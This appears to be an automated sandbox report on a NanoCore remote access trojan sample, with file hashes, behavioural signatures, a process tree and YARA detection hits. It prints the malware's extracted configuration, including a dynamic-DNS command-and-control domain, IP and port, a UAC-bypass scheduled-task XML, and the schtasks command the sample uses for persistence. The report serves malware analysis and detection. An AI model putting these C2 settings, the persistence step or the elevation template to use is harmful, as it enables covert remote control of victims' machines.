Play interactive tour

Edit tour

Windows Analysis Report YdACOWCggQ.exe

Overview

General Information

Sample Name:	YdACOWCggQ.exe
Analysis ID:	501907
MD5:	b866823e1f8f4a52376bd108c457dd78
SHA1:	fe99849ec27630463080445337798eeba8000a02
SHA256:	ebe1bb18a77cf0b34d3ad06919a9adfff2aa69cfafa5b96b670534b890e3e2a8
Tags:	exeNanoCoreRAT
Infos:
Most interesting Screenshot:

Detection

Nanocore

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Sigma detected: NanoCore

Detected Nanocore Rat

Yara detected AntiVM autoit script

Yara detected Nanocore RAT

Found malware configuration

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments

Allocates memory in foreign processes

.NET source code contains potential unpacker

Injects a PE file into a foreign processes

Hides that the sample has been downloaded from the Internet (zone.identifier)

Uses schtasks.exe or at.exe to add and modify task schedules

Uses dynamic DNS services

Drops PE files with a suspicious file extension

Writes to foreign memory regions

C2 URLs / IPs found in malware configuration

Antivirus or Machine Learning detection for unpacked file

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Sleep loop found (likely to delay execution)

Detected potential crypto function

Contains functionality to launch a process as a different user

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to dynamically determine API calls

Contains functionality to simulate keystroke presses

Contains long sleeps (>= 3 min)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

OS version to string mapping found (often used in BOTs)

PE file contains strange resources

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Contains functionality to retrieve information about pressed keystrokes

Dropped file seen in connection with other malware

Creates a process in suspended mode (likely to inject code)

Contains functionality for read data from the clipboard

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to shutdown / reboot the system

Contains functionality to execute programs as a different user

Internet Provider seen in connection with other malware

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Contains functionality to communicate with device drivers

Contains functionality to read the clipboard data

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Installs a raw input device (often for capturing keystrokes)

File is packed with WinRar

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Detected TCP or UDP traffic on non-standard ports

Contains functionality to launch a program with higher privileges

Potential key logger detected (key state polling based)

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Contains functionality to simulate mouse events

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Classification

Process Tree

System is w10x64

YdACOWCggQ.exe (PID: 4896 cmdline: 'C:\Users\user\Desktop\YdACOWCggQ.exe' MD5: B866823E1F8F4A52376BD108C457DD78)

mmuiqlcvwo.pif (PID: 5828 cmdline: 'C:\Users\user\33920049\mmuiqlcvwo.pif' fmkkelc.omp MD5: 8E699954F6B5D64683412CC560938507)

RegSvcs.exe (PID: 6240 cmdline: C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)

schtasks.exe (PID: 6272 cmdline: 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpB828.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)

conhost.exe (PID: 6280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

RegSvcs.exe (PID: 6348 cmdline: C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe 0 MD5: 2867A3817C9245F7CF518524DFD18F28)

conhost.exe (PID: 6364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: NanoCore

{"Version": "1.2.2.0", "Mutex": "c213d282-998c-4a04-8f80-944681ca", "Group": "nano stub", "Domain1": "ezeani.duckdns.org", "Domain2": "194.5.98.48", "Port": 8338, "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo />\r\n  <Triggers />\r\n  <Principals>\r\n    <Principal id=\"Author\">\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Priority>4</Priority>\r\n  </Settings>\r\n  <Actions Context=\"Author\">\r\n    <Exec>\r\n      <Command>\"#EXECUTABLEPATH\"</Command>\r\n      <Arguments>$(Arg0)</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
0000000E.00000002.784677096.0000000006290000.00000004.00020000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost
0000000E.00000002.784677096.0000000006290000.00000004.00020000.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xf7ad:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost
0000000E.00000002.784677096.0000000006290000.00000004.00020000.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000008.00000003.300093094.0000000004364000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7e5:$x1: NanoCore.ClientPluginHost 0xf822:$x2: IClientNetworkHost 0x13355:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000008.00000003.300093094.0000000004364000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000008.00000003.300093094.0000000004364000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xf54d:$a: NanoCore 0xf55d:$a: NanoCore 0xf791:$a: NanoCore 0xf7a5:$a: NanoCore 0xf7e5:$a: NanoCore 0xf5ac:$b: ClientPlugin 0xf7ae:$b: ClientPlugin 0xf7ee:$b: ClientPlugin 0xf6d3:$c: ProjectData 0x100da:$d: DESCrypto 0x17aa6:$e: KeepAlive 0x15a94:$g: LogClientMessage 0x11c8f:$i: get_Connected 0x10410:$j: #=q 0x10440:$j: #=q 0x1045c:$j: #=q 0x1048c:$j: #=q 0x104a8:$j: #=q 0x104c4:$j: #=q 0x104f4:$j: #=q 0x10510:$j: #=q
00000008.00000003.300748651.00000000043FD000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf1fd:$x1: NanoCore.ClientPluginHost 0x42005:$x1: NanoCore.ClientPluginHost 0xf23a:$x2: IClientNetworkHost 0x42042:$x2: IClientNetworkHost 0x12d6d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x45b75:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000008.00000003.300748651.00000000043FD000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000008.00000003.300748651.00000000043FD000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xef65:$a: NanoCore 0xef75:$a: NanoCore 0xf1a9:$a: NanoCore 0xf1bd:$a: NanoCore 0xf1fd:$a: NanoCore 0x41d6d:$a: NanoCore 0x41d7d:$a: NanoCore 0x41fb1:$a: NanoCore 0x41fc5:$a: NanoCore 0x42005:$a: NanoCore 0xefc4:$b: ClientPlugin 0xf1c6:$b: ClientPlugin 0xf206:$b: ClientPlugin 0x41dcc:$b: ClientPlugin 0x41fce:$b: ClientPlugin 0x4200e:$b: ClientPlugin 0xf0eb:$c: ProjectData 0x41ef3:$c: ProjectData 0xfaf2:$d: DESCrypto 0x428fa:$d: DESCrypto 0x174be:$e: KeepAlive
00000008.00000003.300023978.0000000004397000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf5ed:$x1: NanoCore.ClientPluginHost 0xf62a:$x2: IClientNetworkHost 0x1315d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000008.00000003.300023978.0000000004397000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000008.00000003.300023978.0000000004397000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xf355:$a: NanoCore 0xf365:$a: NanoCore 0xf599:$a: NanoCore 0xf5ad:$a: NanoCore 0xf5ed:$a: NanoCore 0xf3b4:$b: ClientPlugin 0xf5b6:$b: ClientPlugin 0xf5f6:$b: ClientPlugin 0xf4db:$c: ProjectData 0xfee2:$d: DESCrypto 0x178ae:$e: KeepAlive 0x1589c:$g: LogClientMessage 0x11a97:$i: get_Connected 0x10218:$j: #=q 0x10248:$j: #=q 0x10264:$j: #=q 0x10294:$j: #=q 0x102b0:$j: #=q 0x102cc:$j: #=q 0x102fc:$j: #=q 0x10318:$j: #=q
00000008.00000003.302510420.0000000004331000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf9dd:$x1: NanoCore.ClientPluginHost 0xfa1a:$x2: IClientNetworkHost 0x1354d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000008.00000003.302510420.0000000004331000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000008.00000003.302510420.0000000004331000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xf745:$a: NanoCore 0xf755:$a: NanoCore 0xf989:$a: NanoCore 0xf99d:$a: NanoCore 0xf9dd:$a: NanoCore 0xf7a4:$b: ClientPlugin 0xf9a6:$b: ClientPlugin 0xf9e6:$b: ClientPlugin 0xf8cb:$c: ProjectData 0x102d2:$d: DESCrypto 0x17c9e:$e: KeepAlive 0x15c8c:$g: LogClientMessage 0x11e87:$i: get_Connected 0x10608:$j: #=q 0x10638:$j: #=q 0x10654:$j: #=q 0x10684:$j: #=q 0x106a0:$j: #=q 0x106bc:$j: #=q 0x106ec:$j: #=q 0x10708:$j: #=q
0000000E.00000002.783237000.0000000004829000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000E.00000002.783237000.0000000004829000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x36ad:$a: NanoCore 0x3706:$a: NanoCore 0x3743:$a: NanoCore 0x37bc:$a: NanoCore 0x16e67:$a: NanoCore 0x16e7c:$a: NanoCore 0x16eb1:$a: NanoCore 0x20719:$a: NanoCore 0x2fedb:$a: NanoCore 0x2fef0:$a: NanoCore 0x2ff25:$a: NanoCore 0x370f:$b: ClientPlugin 0x374c:$b: ClientPlugin 0x404a:$b: ClientPlugin 0x4057:$b: ClientPlugin 0x16c23:$b: ClientPlugin 0x16c3e:$b: ClientPlugin 0x16c6e:$b: ClientPlugin 0x16e85:$b: ClientPlugin 0x16eba:$b: ClientPlugin 0x2fc97:$b: ClientPlugin
00000008.00000003.300163395.0000000004331000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf9dd:$x1: NanoCore.ClientPluginHost 0xfa1a:$x2: IClientNetworkHost 0x1354d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000008.00000003.300163395.0000000004331000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000008.00000003.300163395.0000000004331000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xf745:$a: NanoCore 0xf755:$a: NanoCore 0xf989:$a: NanoCore 0xf99d:$a: NanoCore 0xf9dd:$a: NanoCore 0xf7a4:$b: ClientPlugin 0xf9a6:$b: ClientPlugin 0xf9e6:$b: ClientPlugin 0xf8cb:$c: ProjectData 0x102d2:$d: DESCrypto 0x17c9e:$e: KeepAlive 0x15c8c:$g: LogClientMessage 0x11e87:$i: get_Connected 0x10608:$j: #=q 0x10638:$j: #=q 0x10654:$j: #=q 0x10684:$j: #=q 0x106a0:$j: #=q 0x106bc:$j: #=q 0x106ec:$j: #=q 0x10708:$j: #=q
00000008.00000003.302257446.0000000004792000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xffad:$x1: NanoCore.ClientPluginHost 0xffea:$x2: IClientNetworkHost 0x13b1d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000008.00000003.302257446.0000000004792000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000008.00000003.302257446.0000000004792000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfd15:$a: NanoCore 0xfd25:$a: NanoCore 0xff59:$a: NanoCore 0xff6d:$a: NanoCore 0xffad:$a: NanoCore 0xfd74:$b: ClientPlugin 0xff76:$b: ClientPlugin 0xffb6:$b: ClientPlugin 0xfe9b:$c: ProjectData 0x108a2:$d: DESCrypto 0x1826e:$e: KeepAlive 0x1625c:$g: LogClientMessage 0x12457:$i: get_Connected 0x10bd8:$j: #=q 0x10c08:$j: #=q 0x10c24:$j: #=q 0x10c54:$j: #=q 0x10c70:$j: #=q 0x10c8c:$j: #=q 0x10cbc:$j: #=q 0x10cd8:$j: #=q
00000008.00000003.302075228.0000000004397000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf5ed:$x1: NanoCore.ClientPluginHost 0x423f5:$x1: NanoCore.ClientPluginHost 0xf62a:$x2: IClientNetworkHost 0x42432:$x2: IClientNetworkHost 0x1315d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x45f65:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000008.00000003.302075228.0000000004397000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000008.00000003.302075228.0000000004397000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xf355:$a: NanoCore 0xf365:$a: NanoCore 0xf599:$a: NanoCore 0xf5ad:$a: NanoCore 0xf5ed:$a: NanoCore 0x4215d:$a: NanoCore 0x4216d:$a: NanoCore 0x423a1:$a: NanoCore 0x423b5:$a: NanoCore 0x423f5:$a: NanoCore 0xf3b4:$b: ClientPlugin 0xf5b6:$b: ClientPlugin 0xf5f6:$b: ClientPlugin 0x421bc:$b: ClientPlugin 0x423be:$b: ClientPlugin 0x423fe:$b: ClientPlugin 0xf4db:$c: ProjectData 0x422e3:$c: ProjectData 0xfee2:$d: DESCrypto 0x42cea:$d: DESCrypto 0x178ae:$e: KeepAlive
00000008.00000003.302576684.00000000041A6000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x100ed:$x1: NanoCore.ClientPluginHost 0x1012a:$x2: IClientNetworkHost 0x13c5d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000008.00000003.302576684.00000000041A6000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000008.00000003.302576684.00000000041A6000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfe55:$a: NanoCore 0xfe65:$a: NanoCore 0x10099:$a: NanoCore 0x100ad:$a: NanoCore 0x100ed:$a: NanoCore 0xfeb4:$b: ClientPlugin 0x100b6:$b: ClientPlugin 0x100f6:$b: ClientPlugin 0xffdb:$c: ProjectData 0x109e2:$d: DESCrypto 0x183ae:$e: KeepAlive 0x1639c:$g: LogClientMessage 0x12597:$i: get_Connected 0x10d18:$j: #=q 0x10d48:$j: #=q 0x10d64:$j: #=q 0x10d94:$j: #=q 0x10db0:$j: #=q 0x10dcc:$j: #=q 0x10dfc:$j: #=q 0x10e18:$j: #=q
0000000E.00000002.784402740.00000000060F0000.00000004.00020000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
0000000E.00000002.784402740.00000000060F0000.00000004.00020000.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost
00000008.00000003.302365365.00000000043C9000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x103f5:$x1: NanoCore.ClientPluginHost 0x10432:$x2: IClientNetworkHost 0x13f65:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000008.00000003.302365365.00000000043C9000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000008.00000003.302365365.00000000043C9000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x1015d:$a: NanoCore 0x1016d:$a: NanoCore 0x103a1:$a: NanoCore 0x103b5:$a: NanoCore 0x103f5:$a: NanoCore 0x101bc:$b: ClientPlugin 0x103be:$b: ClientPlugin 0x103fe:$b: ClientPlugin 0x102e3:$c: ProjectData 0x10cea:$d: DESCrypto 0x186b6:$e: KeepAlive 0x166a4:$g: LogClientMessage 0x1289f:$i: get_Connected 0x11020:$j: #=q 0x11050:$j: #=q 0x1106c:$j: #=q 0x1109c:$j: #=q 0x110b8:$j: #=q 0x110d4:$j: #=q 0x11104:$j: #=q 0x11120:$j: #=q
0000000E.00000002.775408567.0000000001302000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000000E.00000002.775408567.0000000001302000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000E.00000002.775408567.0000000001302000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
00000008.00000003.302148632.0000000004364000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7e5:$x1: NanoCore.ClientPluginHost 0xf822:$x2: IClientNetworkHost 0x13355:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000008.00000003.302148632.0000000004364000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000008.00000003.302148632.0000000004364000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xf54d:$a: NanoCore 0xf55d:$a: NanoCore 0xf791:$a: NanoCore 0xf7a5:$a: NanoCore 0xf7e5:$a: NanoCore 0xf5ac:$b: ClientPlugin 0xf7ae:$b: ClientPlugin 0xf7ee:$b: ClientPlugin 0xf6d3:$c: ProjectData 0x100da:$d: DESCrypto 0x17aa6:$e: KeepAlive 0x15a94:$g: LogClientMessage 0x11c8f:$i: get_Connected 0x10410:$j: #=q 0x10440:$j: #=q 0x1045c:$j: #=q 0x1048c:$j: #=q 0x104a8:$j: #=q 0x104c4:$j: #=q 0x104f4:$j: #=q 0x10510:$j: #=q
00000008.00000003.302206640.00000000043C9000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x103f5:$x1: NanoCore.ClientPluginHost 0x10432:$x2: IClientNetworkHost 0x13f65:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000008.00000003.302206640.00000000043C9000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000008.00000003.302206640.00000000043C9000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x1015d:$a: NanoCore 0x1016d:$a: NanoCore 0x103a1:$a: NanoCore 0x103b5:$a: NanoCore 0x103f5:$a: NanoCore 0x101bc:$b: ClientPlugin 0x103be:$b: ClientPlugin 0x103fe:$b: ClientPlugin 0x102e3:$c: ProjectData 0x10cea:$d: DESCrypto 0x186b6:$e: KeepAlive 0x166a4:$g: LogClientMessage 0x1289f:$i: get_Connected 0x11020:$j: #=q 0x11050:$j: #=q 0x1106c:$j: #=q 0x1109c:$j: #=q 0x110b8:$j: #=q 0x110d4:$j: #=q 0x11104:$j: #=q 0x11120:$j: #=q
00000008.00000003.299948083.0000000004331000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf9dd:$x1: NanoCore.ClientPluginHost 0x427e5:$x1: NanoCore.ClientPluginHost 0xfa1a:$x2: IClientNetworkHost 0x42822:$x2: IClientNetworkHost 0x1354d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x46355:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000008.00000003.299948083.0000000004331000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000008.00000003.299948083.0000000004331000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xf745:$a: NanoCore 0xf755:$a: NanoCore 0xf989:$a: NanoCore 0xf99d:$a: NanoCore 0xf9dd:$a: NanoCore 0x4254d:$a: NanoCore 0x4255d:$a: NanoCore 0x42791:$a: NanoCore 0x427a5:$a: NanoCore 0x427e5:$a: NanoCore 0xf7a4:$b: ClientPlugin 0xf9a6:$b: ClientPlugin 0xf9e6:$b: ClientPlugin 0x425ac:$b: ClientPlugin 0x427ae:$b: ClientPlugin 0x427ee:$b: ClientPlugin 0xf8cb:$c: ProjectData 0x426d3:$c: ProjectData 0x102d2:$d: DESCrypto 0x430da:$d: DESCrypto 0x17c9e:$e: KeepAlive
00000008.00000003.300057334.00000000041A7000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf8f5:$x1: NanoCore.ClientPluginHost 0xf932:$x2: IClientNetworkHost 0x13465:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000008.00000003.300057334.00000000041A7000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000008.00000003.300057334.00000000041A7000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xf65d:$a: NanoCore 0xf66d:$a: NanoCore 0xf8a1:$a: NanoCore 0xf8b5:$a: NanoCore 0xf8f5:$a: NanoCore 0xf6bc:$b: ClientPlugin 0xf8be:$b: ClientPlugin 0xf8fe:$b: ClientPlugin 0xf7e3:$c: ProjectData 0x101ea:$d: DESCrypto 0x17bb6:$e: KeepAlive 0x15ba4:$g: LogClientMessage 0x11d9f:$i: get_Connected 0x10520:$j: #=q 0x10550:$j: #=q 0x1056c:$j: #=q 0x1059c:$j: #=q 0x105b8:$j: #=q 0x105d4:$j: #=q 0x10604:$j: #=q 0x10620:$j: #=q
00000008.00000003.301942248.00000000043FD000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf24d:$x1: NanoCore.ClientPluginHost 0x2b9ed:$x1: NanoCore.ClientPluginHost 0xf28a:$x2: IClientNetworkHost 0x2ba2a:$x2: IClientNetworkHost 0x12dbd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x2f55d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000008.00000003.301942248.00000000043FD000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000008.00000003.301942248.00000000043FD000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xefb5:$a: NanoCore 0xefc5:$a: NanoCore 0xf1f9:$a: NanoCore 0xf20d:$a: NanoCore 0xf24d:$a: NanoCore 0x2b755:$a: NanoCore 0x2b765:$a: NanoCore 0x2b999:$a: NanoCore 0x2b9ad:$a: NanoCore 0x2b9ed:$a: NanoCore 0xf014:$b: ClientPlugin 0xf216:$b: ClientPlugin 0xf256:$b: ClientPlugin 0x2b7b4:$b: ClientPlugin 0x2b9b6:$b: ClientPlugin 0x2b9f6:$b: ClientPlugin 0xf13b:$c: ProjectData 0x2b8db:$c: ProjectData 0xfb42:$d: DESCrypto 0x2c2e2:$d: DESCrypto 0x1750e:$e: KeepAlive
